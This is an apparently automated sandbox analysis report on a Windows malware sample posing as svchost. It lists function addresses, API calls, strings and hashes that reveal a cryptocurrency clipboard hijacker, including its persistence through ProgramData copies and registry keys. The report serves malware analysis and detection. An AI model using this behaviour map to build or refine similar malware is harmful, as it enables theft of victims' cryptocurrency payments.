                                      • Instruction ID: 97cd00bbafddeea18524e87ba9999e83b9df1a82b7e94daaf0906db5b7771dd5
                                      • Opcode Fuzzy Hash: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction Fuzzy Hash: 6DB09B310001087BCB012F12DC098893F15DB407507148035F50C05031DF71ADD5D589
                                      Function 0041169F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 212 41169f-4116ab call 41155f 214 4116b0-4116b4 212->214
                                      APIs
                                      • _doexit.LIBCMT ref: 004116AB
                                        • Part of subcall function 0041155F: __lock.LIBCMT ref: 0041156D
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(0041E0B0,00000020,004116C6,00000000,00000001,00000000,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115A9
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115BA
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(-00000004,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115E0
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115F3
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115FD
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DecodePointer$__lock_doexit
                                      • String ID:
                                      • API String ID: 3343572566-0
                                      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction ID: 69d7dd60be9393ca9a75932822da633d8709a72556d2422c147b43d379804c5d
                                      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction Fuzzy Hash: 78B0923258020C33DA202646AC03F463A0E87C0B64F250022FA0D1D1A2A9A2A9A1808A

                                      Non-executed Functions

                                      Function 0040D7F0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 394COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 332 40d7f0-40d897 call 4123e0 * 4 GetModuleFileNameW 341 40d8a0-40d8be call 40eedb 332->341 342 40d899-40d89b 332->342 348 40d8c0-40d8c2 341->348 349 40d8c7-40d8f4 call 40eedb 341->349 343 40de04-40de11 call 40e542 342->343 348->343 352 40d904-40d906 349->352 353 40d8f6-40d902 349->353 352->343 353->352 354 40d90b-40d94c call 40f501 SHGetFolderPathW 353->354 357 40d967-40d9ac call 40f5ce * 2 CreateDirectoryW 354->357 358 40d94e-40d964 call 40f643 354->358 365 40d9c2-40da36 SetFileAttributesW call 40f5ce * 3 CopyFileW 357->365 366 40d9ae-40d9b9 GetLastError 357->366 358->357 374 40da38-40da3a 365->374 375 40da3f-40dab7 SetFileAttributesW call 40f5ce * 2 RegCreateKeyExW 365->375 366->365 367 40d9bb-40d9bd 366->367 367->343 374->343 380 40db4b-40db54 375->380 381 40dabd-40dad2 375->381 383 40dc12-40dc1b 380->383 384 40db5a-40db7e RegCreateKeyExW 380->384 382 40dad8-40daf7 381->382 382->382 385 40daf9-40db45 RegSetValueExW RegCloseKey 382->385 387 40dc32-40dc3b 383->387 388 40dc1d-40dc2c call 40d6d0 383->388 384->383 386 40db84-40db99 384->386 385->380 392 40db9f-40dbbe 386->392 390 40dc44-40dc62 call 40eedb 387->390 391 40dc3d-40dc3f 387->391 388->387 397 40dd85-40dde2 call 4123e0 CreateProcessW 390->397 398 40dc68-40dc86 call 40eedb 390->398 391->343 392->392 395 40dbc0-40dc0c RegSetValueExW RegCloseKey 392->395 395->383 403 40de02 397->403 404 40dde4-40de00 CloseHandle * 2 397->404 398->397 405 40dc8c-40dca8 398->405 403->343 404->343 406 40dcae-40dcf4 405->406 406->406 407 40dcf6-40dd12 406->407 408 40dd18-40dd5e 407->408 408->408 409 40dd60-40dd7f CopyFileW SetFileAttributesW 408->409 409->397
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A
                                      Function 00405390 Relevance: 25.7, APIs: 17, Instructions: 207clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      Function 004058A0 Relevance: 18.2, APIs: 12, Instructions: 152windowsynchronizationclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • AddClipboardFormatListener.USER32(00000000), ref: 0040595B
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,EED2DB5A), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNEL32(00000014), ref: 00405A31
                                      • RemoveClipboardFormatListener.USER32(00000000), ref: 00405A67
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(00000000), ref: 00405A8E
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DestroyMessageWindow$ClipboardFormatListener_rand$DispatchErrorLastMutexObjectPeekReleaseRemoveSingleSleepTranslateWait
                                      • String ID:
                                      • API String ID: 2075554847-0
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29
                                      Function 00405670 Relevance: 12.1, APIs: 8, Instructions: 140timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59
                                      Function 0040E542 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D
                                      Function 00410689 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 410 410689-41069b GetModuleHandleW 411 4106a6-4106ee GetProcAddress * 4 410->411 412 41069d-4106a5 call 4103d6 410->412 414 4106f0-4106f7 411->414 415 410706-410725 411->415 414->415 418 4106f9-410700 414->418 416 41072a-410738 TlsAlloc 415->416 420 4107ff 416->420 421 41073e-410749 TlsSetValue 416->421 418->415 419 410702-410704 418->419 419->415 419->416 423 410801-410803 420->423 421->420 422 41074f-410795 call 411471 EncodePointer * 4 call 412581 421->422 428 410797-4107b4 DecodePointer 422->428 429 4107fa call 4103d6 422->429 428->429 432 4107b6-4107c8 call 412773 428->432 429->420 432->429 435 4107ca-4107dd DecodePointer 432->435 435->429 437 4107df-4107f8 call 410413 GetCurrentThreadId 435->437 437->423
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      Function 00406940 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      Function 004018D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      Function 00410413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      Function 00415C24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      Function 0040D490 Relevance: 9.2, APIs: 6, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,EED2DB5A,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      Function 0040E210 Relevance: 9.1, APIs: 6, Instructions: 97registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
